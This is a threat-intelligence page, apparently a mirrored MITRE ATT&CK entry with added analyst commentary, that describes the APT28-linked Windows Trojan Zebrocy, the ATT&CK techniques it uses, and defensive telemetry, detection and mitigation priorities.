S0251: Zebrocy
Analyst context for executives and security teams
Zebrocy matters because ATT&CK describes it as a Windows Trojan used by APT28 since at least November 2015, with multiple language variants. For leaders, the defensive value is not the malware name alone; it is the behavior cluster around discovery, persistence, command execution, collection, command-and-control, and exfiltration. If an organization cannot see registry queries, WMI or command-shell execution, scheduled tasks or logon-script persistence, local staging, and web or mail protocol C2 patterns on Windows endpoints, it may struggle to investigate this family of activity or produce credible incident and audit evidence.
Executive priority
Prioritize Zebrocy as a validation case for Windows endpoint visibility, SOC readiness, and incident response evidence quality. The ATT&CK relationships show behaviors that can support credential access, persistence, data collection, and exfiltration over C2 channels, so the business question is whether security teams can rapidly prove scope: which host executed suspicious commands, what persistence was created, what data may have been staged, and what external communications occurred. This is especially relevant for control investment decisions around EDR, centralized Windows logging, network monitoring, and response playbooks.
Technical view
ATT&CK provides no official detection text for Zebrocy, so defenders should build coverage around the related techniques rather than a single signature. Validate Windows telemetry for Query Registry, WMI, Windows Command Shell, Scheduled Task, Windows logon script persistence, process and system discovery, file and directory enumeration, screen capture, local data staging, file deletion, ingress tool transfer, and C2 over web or mail protocols. Because the malware is described as having C++, Delphi, AutoIt, C#, VB.NET, and Golang variants, detection engineering should avoid relying only on static file indicators and should emphasize behavioral correlations across execution, persistence, discovery, collection, and outbound communications.
Likely telemetry
- Windows endpoint process creation and command-line telemetry
- Windows Registry access and modification events, especially persistence-relevant keys
- WMI activity logs and process ancestry involving WMI execution
- Scheduled task creation, modification, and execution records
- Logon script configuration and execution evidence
Detection direction
- Correlate discovery-heavy activity with subsequent persistence, staging, and outbound C2 rather than alerting on common administrative commands in isolation.
- Tune for unusual WMI, cmd.exe, scheduled task, and registry activity by user, host role, parent process, and execution context to reduce false positives from normal administration.
- Confirm whether endpoint tooling records enough command-line, file, registry, and network context to reconstruct an incident timeline after file deletion or tool transfer.
- Review direct mail protocol use from endpoints; in many environments this is uncommon and may be higher signal, but exceptions must be baselined.
- Treat packed or variant binaries as a blind spot for static detection and validate memory/behavioral analytics where available.
Mitigation priorities
- Start with visibility: ensure Windows endpoints, network egress points, and identity-relevant systems produce centralized, retained telemetry for the behaviors listed in the ATT&CK relationships.
- Harden and monitor persistence paths including scheduled tasks and Windows logon scripts, with change control for legitimate administrative use.
- Restrict and monitor high-risk execution paths such as WMI and command shell usage where business operations allow.
- Apply least privilege and administrative separation so discovery and persistence attempts from standard user contexts are easier to detect and contain.
- Control outbound communications by enforcing proxying, DNS logging, and egress rules for web and mail protocols instead of allowing unrestricted endpoint connections.
Analyst notes and limits
This take is based on the supplied ATT&CK malware object, external references, and relationship context. The most decision-useful context is that Zebrocy is a Windows Trojan associated in ATT&CK with APT28 use and a broad set of related techniques spanning discovery, execution, persistence, collection, C2, exfiltration, and stealth. The object does not provide official detection guidance, so recommendations are framed as validation directions derived from related ATT&CK techniques, not as confirmed detections for every Zebrocy variant.
The supplied object lists Windows as the malware platform and does not specify tactics directly. Several related techniques have broader platform listings, but this take does not expand Zebrocy beyond Windows. No active exploitation status, customer exposure, specific indicators of compromise, campaign targeting, or guaranteed detection coverage is provided in the supplied fields. Local baselines, logging configuration, and environment-specific use of administrative tools are required to judge alert fidelity.
Zebrocy
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1124 | System Time Discovery | |
| Enterprise | T1057 | Process Discovery | |
| Enterprise | T1047 | Windows Management Instrumentation | |
| Enterprise | T1049 | System Network Connections Discovery | Zebrocy uses |
| Enterprise | T1105 | Ingress Tool Transfer | |
| Enterprise | T1113 | Screen Capture | |
| Enterprise | T1120 | Peripheral Device Discovery | |
| Enterprise | T1033 | System Owner/User Discovery | |
| Enterprise | T1056.004 | Credential API Hooking Sub-technique | Zebrocy installs an application-defined Windows hook to get notified when a network drive has been attached, so it can then use the hook to call its RecordToFile file stealing method.CitationSecurelist Sofacy Feb 2018 |
| Enterprise | T1041 | Exfiltration Over C2 Channel | |
| Enterprise | T1082 | System Information Discovery | |
| Enterprise | T1071.003 | Mail Protocols Sub-technique | |
| Enterprise | T1071.001 | Web Protocols Sub-technique | |
| Enterprise | T1016 | System Network Configuration Discovery | Zebrocy runs the |
| Enterprise | T1083 | File and Directory Discovery | Zebrocy searches for files that are 60mb and less and contain the following extensions: .doc, .docx, .xls, .xlsx, .ppt, .pptx, .exe, .zip, and .rar. Zebrocy also runs the |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder Sub-technique | |
| Enterprise | T1027.002 | Software Packing Sub-technique | |
| Enterprise | T1680 | Local Storage Discovery | |
| Enterprise | T1560 | Archive Collected Data | |
| Enterprise | T1037.001 | Logon Script (Windows) Sub-technique | Zebrocy performs persistence with a logon script via adding to the Registry key |
| Enterprise | T1059.003 | Windows Command Shell Sub-technique | |
| Enterprise | T1573.002 | Asymmetric Cryptography Sub-technique | |
| Enterprise | T1074.001 | Local Data Staging Sub-technique | Zebrocy stores all collected information in a single file before exfiltration.CitationESET Zebrocy Nov 2018 |
| Enterprise | T1012 | Query Registry | Zebrocy executes the |
| Enterprise | T1070.004 | File Deletion Sub-technique | |
| Enterprise | T1132.001 | Standard Encoding Sub-technique | |
| Enterprise | T1135 | Network Share Discovery | Zebrocy identifies network drives when they are added to victim systems.CitationSecurelist Sofacy Feb 2018 |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | |
| Enterprise | T1119 | Automated Collection | Zebrocy scans the system and automatically collects files with the following extensions: .doc, .docx, ,.xls, .xlsx, .pdf, .pptx, .rar, .zip, .jpg, .jpeg, .bmp, .tiff, .kum, .tlg, .sbx, .cr, .hse, .hsf, and .lhz.CitationESET Zebrocy Nov 2018CitationESET Zebrocy May 2019 |
| Enterprise | T1053.005 | Scheduled Task Sub-technique | |
| Enterprise | T1555.003 | Credentials from Web Browsers Sub-technique | Zebrocy has the capability to upload dumper tools that extract credentials from web browsers and store them in database files.CitationESET Zebrocy May 2019 |
Groups, software, and campaigns
G0007: APT28
APT28 is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.[1][2] This group has been active since at least 2004.[3][4][5][6][7][8][9][10][11][12][13]
APT28 reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election.[5] In 2018, the US indicted five GRU Unit 26165 officers associated with APT28 for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.[14] Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as Sandworm Team.
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 3.1 | Current bundle | 82f36f10b4ed… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
Palo Alto Sofacy 06-2018
Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018.
Open source URL -
[2]
Unit42 Cannon Nov 2018
Falcone, R., Lee, B. (2018, November 20). Sofacy Continues Global Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved November 26, 2018.
Open source URL -
[3]
Unit42 Sofacy Dec 2018
Lee, B., Falcone, R. (2018, December 12). Dear Joohn: The Sofacy Group’s Global Campaign. Retrieved April 19, 2019.
Open source URL -
[4]
CISA Zebrocy Oct 2020
CISA. (2020, October 29). Malware Analysis Report (AR20-303B). Retrieved December 9, 2020.
Open source URL -
[5]
Accenture SNAKEMACKEREL Nov 2018
Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019.
Open source URL -
[6]
CyberScoop APT28 Nov 2018
Shoorbajee, Z. (2018, November 29). Accenture: Russian hackers using Brexit talks to disguise phishing lures. Retrieved July 16, 2019.
Open source URL -
[7]
Zebrocy
(Citation: Palo Alto Sofacy 06-2018)(Citation: Unit42 Cannon Nov 2018)
-
[8]
Zekapab
(Citation: CyberScoop APT28 Nov 2018)(Citation: Accenture SNAKEMACKEREL Nov 2018)
-
[9]
mitre-attack S0251Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.